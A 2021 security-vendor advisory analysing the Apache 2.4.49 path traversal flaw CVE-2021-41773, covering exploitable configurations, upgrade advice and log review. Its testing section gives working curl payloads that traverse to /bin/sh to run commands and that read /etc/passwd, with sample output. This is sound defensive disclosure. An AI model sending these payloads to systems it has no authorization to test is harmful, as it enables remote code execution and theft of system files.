Beyond vulnerability scanning: Enhancing attack surface management for more proactive security

October 7, 2021

Technical Analysis: Apache HTTP Server CVE-2021-41773

By: Randori Attack Team

Share on facebook
Share on twitter
Share on linkedin

On October 5, 2021, the Apache Software Foundation provided an update that patched CVE-2021-41773. This vulnerability is a path normalization issue that can be leveraged to read arbitrary files and in some cases execute remote code in Apache’s widely adopted HTTP Server. It affects version 2.4.49 only but is actively being exploited in the wild and Randori has found numerous matching versions exposed on internet-facing assets.  

Randori Temptation Score for Apache 2.4.49

The Randori Attack Team has successfully developed a reliable working exploit, tested it in a lab environment and began leveraging the capability as part of Randori’s continuous and automated red team platform. Under the right configuration settings, this vulnerability is trivial to exploit and affected organizations should patch immediately. 

For defenders looking for a way to understand if they are impacted, the Randori Attack Team has provided details on the non-default configurations required for successful exploitation and steps organizations can take to test for the vulnerability.

Exploitable Configurations

To successfully exploit CVE-2021-41773, Apache 2.4.49 must be set up in a non-default configuration.

There are two configuration patterns that are susceptible to two different exploitation techniques:

  1. If mod_cgi is enabled and “require all granted” is applied to the default Directory block, then an attacker can execute remote code with permissions of the user running Apache.
  2. If mod_cgi is not enabled and “require all granted” is applied to the default Directory block, then an attacker can read arbitrary files with permissions of the user running Apache.

If a system has these configurations exploitation of this vulnerability is trivial. If “require all granted” is present for any path exploitation may be possible and other cases may exist. Randori recommends upgrading to Apache 2.4.50.

How To Test For Vulnerability

Scenario 1: Vulnerable to Remote Code Execution

Example of remote code execution on a system with mod_cgi enabled. 

curl ‘$HOST/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh’ -d ‘echo;id’

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Scenario 2: Vulnerable to File Inclusion

Example of reading a file on a vulnerable system without mod_cgi enabled.

curl ‘$HOST/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd’

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Scenario 2: Vulnerable to File Inclusion but not Remote Code Execution

Example of trying to run a command on a system that is vulnerable to file disclosure but does not have mod_cgi enabled.

$ curl ‘$HOST/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh’ -d ‘echo;id’

Warning: Binary output can mess up your terminal. Use “–output -” to tell

Warning: curl to output it to your terminal anyway, or consider “–output

Warning: <FILE>” to save to a file.

Recommended Actions

Based on our research, we can confirm that for organizations running Apache 2.4.49 with a vulnerable configuration this issue is serious and action should be taken to ensure the security of impacted devices. 

The vulnerability was made public on October 5; therefore, organizations running instances of Apache 2.4.49 exposed to the Internet from that date forward should assume that an adversary may have gained access to their network. Randori recommends reviewing historical logs for anomalous behavior such as abnormal URL paths, source IP connections, and other signs of compromise.  

Organizations unsure of their exposure or looking to confirm their risk can request a free attack surface audit from Randori. This personalized assessment will analyze your organized exposed internet-facing asset and provide a custom assessment of your most tempting access and recommendations on how to reduce your risk.   

Sources

Gain an Attacker's Perspective

Uncover your true attack surface with the only ASM platform built by attackers. Stay one step ahead of cyber-criminals, hacktivists and nation-state attackers, by seeing your perimeter as they see it.